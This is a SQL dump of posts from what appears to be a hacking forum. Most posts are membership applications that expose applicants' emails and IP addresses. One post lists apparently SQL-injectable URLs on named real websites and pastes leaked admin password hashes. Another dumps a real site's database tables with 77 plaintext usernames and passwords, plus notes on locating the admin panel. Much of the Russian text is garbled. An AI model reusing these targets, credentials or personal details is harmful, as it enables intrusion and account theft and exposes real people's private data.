41.99.5.150\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2107.3 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1496, 1354, 0, 'Invite', 2, '{$name}', 1407714355, '[SIZE=\'4\'][COLOR=\'Sienna\']freeman007[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123456\n[b]e-mail[/b]: abdelalichair007@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 159.253.145.183\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://freeman007.33bru.com | freeman007.33bru.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1497, 1355, 0, 'Invite', 2, '{$name}', 1407714805, '[SIZE=\'4\'][COLOR=\'Sienna\']0x4h4x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: 0x4h4x@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 177.139.29.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://0x4h4x.deviantart.com | 0x4h4x.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1498, 1356, 0, 'Invite', 2, '{$name}', 1407716363, '[SIZE=\'4\'][COLOR=\'Sienna\']brainfox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: tc-h@live.com\n[b]Info[/b]: skills : web security since 2008 ,, now lot of language of programming like : php , python , perl , assembly , c , c#...\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.100.187.119\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id169338184 | http://vk.com/id169338184 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1499, 1357, 0, 'Invite', 2, '{$name}', 1407726560, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1500, 1358, 0, 'Invite', 2, '{$name}', 1407726659, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: 105.157.171.92\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1501, 1359, 0, 'Invite', 2, '{$name}', 1407726746, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: 105.157.171.92\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1502, 1360, 0, 'Invite', 2, '{$name}', 1407733286, '[SIZE=\'4\'][COLOR=\'Sienna\']Alai[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: prolixy@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.99.53.223\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://alai.ro | alai.ro \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1503, 1361, 0, 'Invite', 2, '{$name}', 1407733603, '[SIZE=\'4\'][COLOR=\'Sienna\']Tundra[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: prolixy@list.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.99.53.223\n[*][b]real ip[/b]: 37.99.53.223\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tundra.aero | tundra.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1504, 1362, 0, 'Invite', 2, '{$name}', 1407735917, '[SIZE=\'4\'][COLOR=\'Sienna\']drav0c[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dravoc@blah.im\n[b]e-mail[/b]: dnsapps@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 74.120.13.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.wowprogress.com/user/Drav0c | http://www.wowprogress.com/user/Drav0c \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1505, 1363, 0, 'null', 9, 'Sql inj', 1407736309, 'ÃÂõÑÂúþûьúþ ÑÂúуûõù\r\nØýтõрõÑÂõý тõü чтþ ÑÂõрòõр ÿрøýðôûõöøт Huffingtonpost\r\n[QUOTE][url]http://ariannaonline-huffpost-ewr.evip.aol.com/columns/column.php?id=324[/url][/QUOTE]\r\n\r\nÚðúþù тþ ÑÂðùт free.fr\r\ninformation_sheme\r\n[QUOTE][url]http://animeasialyrics.free.fr/song_lyrics.php?id=9130[/url][/QUOTE]\r\n\r\nsmh.com.au\r\n[QUOTE][url]http://ultimate-footy.smh.com.au/ajax/ladder.php?l=142250[/url][/QUOTE]\r\náðüðѠøýтõрõÑÂýðѠ÷ðÿøÑÂÑŒ \r\n[QUOTE] 1 | 72R93592FA4992034 | Power | Ryan | [email]admin@ultimatefooty.com.au[/email] | 1 | 1 | 0 | 0 | 562b1ef2bc8577ab62c9fd179e7312ed63cac71a | NULL | 11 | power | 4233230f1704e1655cac1c882adb328875f31de6 | 0 | 1202040564 | 1 | T | 1 | | 1368776274 | NULL | | NULL | Power | 0 | NULL | theage | 1 | NULL | 0 [/QUOTE]\r\n\r\ntut.by ÑÂúуûю чõрõ÷ ÿü þтôðü ýуöôðющøüÑÂÑÂ))\r\n[QUOTE]| 20 | 1 | 1 | 1 | 1 | NULL | admin | 0000-00-00 00:00:00 | 0 | NULL | b47114c8e76d66c366b4a6f48dccd5c0 | [/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1506, 1364, 0, 'Invite', 2, '{$name}', 1407743135, '[SIZE=\'4\'][COLOR=\'Sienna\']Dubious[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Dubious@irc.net\n[b]e-mail[/b]: byhkkqpz@sharklasers.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.32.181.98\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1507, 1365, 0, 'Invite', 2, '{$name}', 1407744547, '[SIZE=\'4\'][COLOR=\'Sienna\']faza02[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 532673\n[b]e-mail[/b]: yarbabin@gmail.com\n[b]Info[/b]: https://rdot.org/forum/member.php?u=1045\r\n\r\nCompetitive Intelligence, Web-vulns, Programing (Simple scripts in Python, C, C#)\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.162.88.2\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1508, 1083, 1362, 'kx00', 6, '', 1407746563, '[url]http://www.caribbeancom.com/[/url]\r\n\r\n[HTML]Database: movie\r\n[10 tables]\r\n+----------+\r\n| category |\r\n| coupon |\r\n| group |\r\n| login |\r\n| movie |\r\n| orders |\r\n| parts |\r\n| ranking |\r\n| rating |\r\n| series |\r\n+----------+[/HTML]\r\n[HTML]Table: login\r\n[77 entries]\r\n+----------------------+---------+--------------+-----------------+\r\n| user_id | site_id | password | user_name |\r\n+----------------------+---------+--------------+-----------------+\r\n| tmasami | 1700 | LKjsdf3af3a | tmasami |\r\n| studio9014 | 9014 | Lp8jKb6A | H&H |\r\n| webmaster1100 | 1100 | diwoa4wa | webmaster1100 |\r\n| masako | 1700 | mbarrow | Masako Barrow |\r\n| hitomi | 1700 | i86yuLMa+ | hitomi |\r\n| momoko | 1700 | Mnm58bbS] | momoko |\r\n| wuehara | 1700 | zwM52Fm2BSOF | wuehara |\r\n| webmaster1900 | 1900 | GEi8OavC | webmaster1900 |\r\n| mizuho | 1700 | Lbsb>9rQ8 | mizuho |\r\n| kengo | 1700 | test1234 | Kengo Tateda |\r\n| syamamoto | 1700 | Lpm8nyR5 | syamamoto |\r\n| hiro | 1700 | hzusho | Hiro Zusho |\r\n| mariko | 1700 | megami | Mariko Egami |\r\n| nancy | 1700 | nim | Nancy IM |\r\n| daniel | 1700 | dlemos | Daniel Lemos |\r\n| kazunori | 1700 | Lkgm1DSU | Kazunori Koga |\r\n| sales1700 | 1700 | f1Ha8k7A | sales1700 |\r\n| guest1700 | 1700 | AsiDF5de | guest1700 |\r\n| manager1700 | 1700 | Re35Desp | manager1700 |\r\n| webmaster1700 | 1700 | ot8B3cua | webmaster1700 |\r\n| webmaster1200 | 1200 | mRkiap41 | webmaster1200 |\r\n| webmaster1300 | 1300 | iu8aPlev | webmaster1300 |\r\n| webmaster1400 | 1400 | foRpW3gh | webmaster1400 |\r\n| webmaster2300 | 2300 | 52e8irp6 | webmaster2300 |\r\n| webmaster1600 | 1600 | dpe16Vew | webmaster1600 |\r\n| webmaster1800 | 1800 | wosp2Bfr | webmaster1800 |\r\n| webmaster2001 | 2001 | s2xy6me | webmaster2001 |\r\n| studio1500 | 1500 | R5RX8zmU | AVBOX |\r\n| webmaster2200 | 2200 | tWC2RExy | webmaster2200 |\r\n| studio1600 | 1600 | BWhsvHV7 | Dreamroom |\r\n| studio2000 | 2000 | gSfoQQ1w | スカイãƒÂイ |\r\n| studio2100 | 2100 | KyGxZ5qc | S2 エンターテイメント |\r\n| studio9001 | 9001 | snGE1LRN | MUGEN エンターテイメント |\r\n| studio9002 | 9002 | 5q9I7leH | KOKESHI |\r\n| miwa | 1700 | 3939 | miwa |\r\n| d2p | 1700 | MhXv3kkN | D2P |\r\n| akipikka | 1700 | lovemiyomiyo | Akiko Yamamoto |\r\n| dti | 1700 | f1Ha8k7A | staff |\r\n| studio9003 | 9003 | X0tOLs81 | V & R |\r\n| studio9004 | 9004 | QU857aQo | TERIYAKI |\r\n| guest1100 | 1100 | NGm885Wj | guest1100 |\r\n| guest1300 | 1300 | 1wEzY1R7 | guest1300 |\r\n| guest1400 | 1400 | T43YhBc8 | guest1400 |\r\n| guest1800 | 1800 | 964vEKPm | guest1800 |\r\n| guest2200 | 2200 | a9w7ku22 | guest2200 |\r\n| guest1900 | 1900 | QwsF96S7 | guest1900 |\r\n| studio9005 | 9005 | A3TAfe29 | PROGRE |\r\n| enokida | 1700 | e32cy74 | S Enokida |\r\n| studio9010 | 9010 | AkH9Jn71 | スタジオ舞妓 |\r\n| studio9011 | 9011 | Ak8s7jwe | TERIYAKI2 |\r\n| blog1700 | 1700 | Anbksu8ah | blog1700 |\r\n| studio_prog_1600 | 1600 | Ua8aj2Jab4K | PROG |\r\n| studio9102 | 9102 | KaL9UryqBs | B-DASH |\r\n| studio_skyhighx_2000 | 2000 | LAKfs8dfh2l3 | スカイãƒÂイX |\r\n| studio9013 | 9013 | avwP3Cse | hotcream |\r\n| studio9012 | 9012 | Alkjsdf823b | Stage2Media |\r\n| studio_prog2_1600 | 1600 | LKjs983a4bd | PROG2 |\r\n| cjun | 1700 | B1fEAxuCU16y | cjun |\r\n| studio_prog3_1600 | 1600 | 8Hjk2FgwPU | PROG3 |\r\n| dlsystems | 1100 | Kjsd92kasdf | dl systems |\r\n| webmaster2400 | 2400 | JKsd8nhj2 | webmaster2400 |\r\n| ahiguchi | 1700 | akE88AisBIn2 | ahiguchi |\r\n| ysakakibara | 1700 | Xk982jBadf | ysakakibara |\r\n| studio_master | 1100 | Le8H3pEsm | studio_master |\r\n| webmaster1100en | 1100 | Okei3ush4 | webmaster1100en |\r\n| studio9015 | 9015 | 9KjeuHg5 | ティティ (グレイズ) |\r\n| studio9016 | 9016 | 7E3Lgrdg8 | ティティ(TMA) |\r\n| studio9017 | 9017 | Nmajr8kL | MERCI BEAUCOUP |\r\n| weslee1100 | 1100 | Laki8HjmC | weslee1100 |\r\n| marchin1100 | 1100 | O19jF48C | marchin1100 |\r\n| studio9018 | 9018 | L7dTk3qP | Climax Zipang |\r\n| studio9019 | 9019 | Yel7t4ks | ティティ(ABC) |\r\n| studio9020 | 9020 | datPq3r9 | PINK CHAMPAGNE |\r\n| sshimizu | 1700 | hdky5JQzVP | sshimizu |\r\n| studio9021 | 9021 | da4El3pQ | studio MFK |\r\n| studio9022 | 9022 | hlteE9a1P | MURAKAMI(ムラカミ) |\r\n| mmusashi | 1700 | KL89s2afv3 | mmusashi |\r\n+----------------------+---------+--------------+-----------------+[/HTML]\r\n\r\nâðú, ÑÂтø ÷òõрø ðôüøýþòÑÂúøõ. ÃÂôüøýúу ýõ ýðшõû. ÕÑÂть /webmasters/ ýþ ÿþчõüу тþ ÿõрõýðÿрðòÃȄÂõт ýð index, òþ÷üþöýþ ôõûþ ò IP.\r\n \r\nî÷õры ðòтþрø÷уютÑÂѠчõрõ÷ d2pass. òðрøðýт, ýуöõý шõûû ýð b.caribbeancom.com тðü ðòтþрø÷ðцøѠчõрõ÷ API øôõт.', 1, 1, '', 0, 1, 0, 0, 0),
(1509, 1366, 0, 'Invite', 2, '{$name}', 1407747193, '[SIZE=\'4\'][COLOR=\'Sienna\']Leetrax[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: x3o.1337@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 103.230.106.28\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.soonvibes.com/profile/index/id/4965-lee-trax | http://www.soonvibes.com/profile/index/id/4965-lee-trax \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
